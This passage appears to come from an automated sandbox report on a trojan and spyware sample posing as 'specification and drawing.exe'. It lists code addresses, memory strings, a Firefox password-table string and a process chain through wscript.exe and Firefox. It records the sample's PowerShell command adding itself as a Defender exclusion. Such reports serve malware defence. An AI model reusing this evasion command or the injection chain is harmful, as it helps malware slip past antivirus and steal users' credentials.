                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_00418A034_2_00418A03
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004029504_2_00402950
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0042F1E34_2_0042F1E3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004102034_2_00410203
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004032104_2_00403210
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_00416C0E4_2_00416C0E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_00416C134_2_00416C13
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0040E4194_2_0040E419
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004104234_2_00410423
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0040E4234_2_0040E423
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004025404_2_00402540
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0040E5674_2_0040E567
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0040E5734_2_0040E573
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C01004_2_010C0100
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116A1184_2_0116A118
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011581584_2_01158158
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011901AA4_2_011901AA
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011881CC4_2_011881CC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011620004_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118A3524_2_0118A352
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F04_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011903E64_2_011903E6
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011702744_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011502C04_2_011502C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D05354_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011905914_2_01190591
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011824464_2_01182446
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117E4F64_2_0117E4F6
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F47504_2_010F4750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D07704_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CC7C04_2_010CC7C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EC6E04_2_010EC6E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E69624_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A04_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0119A9A64_2_0119A9A6
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D28404_2_010D2840
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DA8404_2_010DA840
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B68B84_2_010B68B8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE8F04_2_010FE8F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118AB404_2_0118AB40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01186BD74_2_01186BD7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA804_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD004_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E8DBF4_2_010E8DBF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CADE04_2_010CADE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0C004_2_010D0C00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170CB54_2_01170CB5
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0CF24_2_010C0CF2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01112F284_2_01112F28
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F0F304_2_010F0F30
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144F404_2_01144F40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114EFA04_2_0114EFA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C2FC84_2_010C2FC8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DCFE04_2_010DCFE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118EE264_2_0118EE26
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0E594_2_010D0E59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118CE934_2_0118CE93
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2E904_2_010E2E90
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118EEDB4_2_0118EEDB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0119B16B4_2_0119B16B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BF1724_2_010BF172
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110516C4_2_0110516C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DB1B04_2_010DB1B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D70C04_2_010D70C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117F0CC4_2_0117F0CC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011870E94_2_011870E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118F0E04_2_0118F0E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118132D4_2_0118132D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BD34C4_2_010BD34C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0111739A4_2_0111739A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D52A04_2_010D52A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EB2C04_2_010EB2C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011712ED4_2_011712ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011875714_2_01187571
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116D5B04_2_0116D5B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118F43F4_2_0118F43F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C14604_2_010C1460
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118F7B04_2_0118F7B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011816CC4_2_011816CC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D99504_2_010D9950
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EB9504_2_010EB950
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113D8004_2_0113D800
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D38E04_2_010D38E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118FB764_2_0118FB76
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EFB804_2_010EFB80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01145BF04_2_01145BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110DBF94_2_0110DBF9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118FA494_2_0118FA49
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01187A464_2_01187A46
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01143A6C4_2_01143A6C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01115AA04_2_01115AA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116DAAC4_2_0116DAAC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117DAC64_2_0117DAC6
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01181D5A4_2_01181D5A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D3D404_2_010D3D40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01187D734_2_01187D73
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EFDC04_2_010EFDC0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01149C324_2_01149C32
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118FCF24_2_0118FCF2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118FF094_2_0118FF09
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D1F924_2_010D1F92
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118FFB14_2_0118FFB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D9EB04_2_010D9EB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0499E4F68_2_0499E4F6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049944208_2_04994420
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A24468_2_049A2446
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049B05918_2_049B0591
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F05358_2_048F0535
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0490C6E08_2_0490C6E0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048EC7C08_2_048EC7C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049147508_2_04914750
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F07708_2_048F0770
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049820008_2_04982000
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049B01AA8_2_049B01AA
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A41A28_2_049A41A2
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A81CC8_2_049A81CC
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0498A1188_2_0498A118
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048E01008_2_048E0100
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049781588_2_04978158
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049702C08_2_049702C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049902748_2_04990274
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049B03E68_2_049B03E6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048FE3F08_2_048FE3F0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AA3528_2_049AA352
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04990CB58_2_04990CB5
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048E0CF28_2_048E0CF2
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F0C008_2_048F0C00
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04908DBF8_2_04908DBF
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048EADE08_2_048EADE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0498CD1F8_2_0498CD1F
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048FAD008_2_048FAD00
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04902E908_2_04902E90
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049ACE938_2_049ACE93
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AEEDB8_2_049AEEDB
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AEE268_2_049AEE26
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F0E598_2_048F0E59
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0496EFA08_2_0496EFA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048E2FC88_2_048E2FC8
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048FCFE08_2_048FCFE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04910F308_2_04910F30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04992F308_2_04992F30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04932F288_2_04932F28
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04964F408_2_04964F40
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048D68B88_2_048D68B8
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0491E8F08_2_0491E8F0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F28408_2_048F2840
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048FA8408_2_048FA840
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F29A08_2_048F29A0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049BA9A68_2_049BA9A6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049069628_2_04906962
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048EEA808_2_048EEA80
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A6BD78_2_049A6BD7
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AAB408_2_049AAB40
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AF43F8_2_049AF43F
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048E14608_2_048E1460
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0498D5B08_2_0498D5B0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A75718_2_049A7571
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A16CC8_2_049A16CC
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AF7B08_2_049AF7B0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F70C08_2_048F70C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0499F0CC8_2_0499F0CC
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A70E98_2_049A70E9
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AF0E08_2_049AF0E0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048FB1B08_2_048FB1B0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049BB16B8_2_049BB16B
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0492516C8_2_0492516C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048DF1728_2_048DF172
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F52A08_2_048F52A0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0490B2C08_2_0490B2C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049912ED8_2_049912ED
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0493739A8_2_0493739A
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A132D8_2_049A132D
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048DD34C8_2_048DD34C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AFCF28_2_049AFCF2
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04969C328_2_04969C32
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0490FDC08_2_0490FDC0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A1D5A8_2_049A1D5A
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F3D408_2_048F3D40
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A7D738_2_049A7D73
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F9EB08_2_048F9EB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F1F928_2_048F1F92
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AFFB18_2_049AFFB1
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AFF098_2_049AFF09
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F38E08_2_048F38E0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0495D8008_2_0495D800
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049859108_2_04985910
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0490B9508_2_0490B950
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048F99508_2_048F9950
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04935AA08_2_04935AA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0498DAAC8_2_0498DAAC
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04991AA38_2_04991AA3
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0499DAC68_2_0499DAC6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AFA498_2_049AFA49
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A7A468_2_049A7A46
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04963A6C8_2_04963A6C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0490FB808_2_0490FB80
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04965BF08_2_04965BF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0492DBF98_2_0492DBF9
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AFB768_2_049AFB76
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00761EA08_2_00761EA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075CD508_2_0075CD50
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075CF708_2_0075CF70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075AF708_2_0075AF70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075AF668_2_0075AF66
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075B0C08_2_0075B0C0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0075B0B48_2_0075B0B4
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007655508_2_00765550
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_007637608_2_00763760
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076375B8_2_0076375B
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0077BD308_2_0077BD30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE70C8_2_047BE70C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BD7D88_2_047BD7D8
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047C51EC8_2_047C51EC
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE2558_2_047BE255
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE3788_2_047BE378
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BE89C8_2_047BE89C
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047BCAB88_2_047BCAB8
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04937E54 appears 102 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 048DB970 appears 280 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0496F290 appears 105 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04925130 appears 58 times
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0495EA12 appears 86 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 0114F290 appears 105 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 010BB970 appears 274 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 01105130 appears 40 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 01117E54 appears 99 times
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: String function: 0113EA12 appears 86 times
                      Source: specification and drawing.exe, 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2165460201.000000000111E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000000.2121321607.0000000000A0E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOdNo.exeF vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2187356402.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000004.00000002.2401295024.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs specification and drawing.exe
                      Source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs specification and drawing.exe
                      Source: specification and drawing.exeBinary or memory string: OriginalFilenameOdNo.exeF vs specification and drawing.exe
                      Source: specification and drawing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specification and drawing.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, hODBbAxf33qWbhEBEP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, hODBbAxf33qWbhEBEP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@15/9
                      Source: C:\Users\user\Desktop\specification and drawing.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\specification and drawing.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt1rsod1.x5z.ps1Jump to behavior
                      Source: specification and drawing.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: specification and drawing.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\specification and drawing.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000993000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2599744547.0000000000966000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2599744547.0000000000993000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2597051422.0000000000966000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4585557607.0000000000966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: specification and drawing.exeReversingLabs: Detection: 65%
                      Source: unknownProcess created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: mscoree.dllJump to behavior
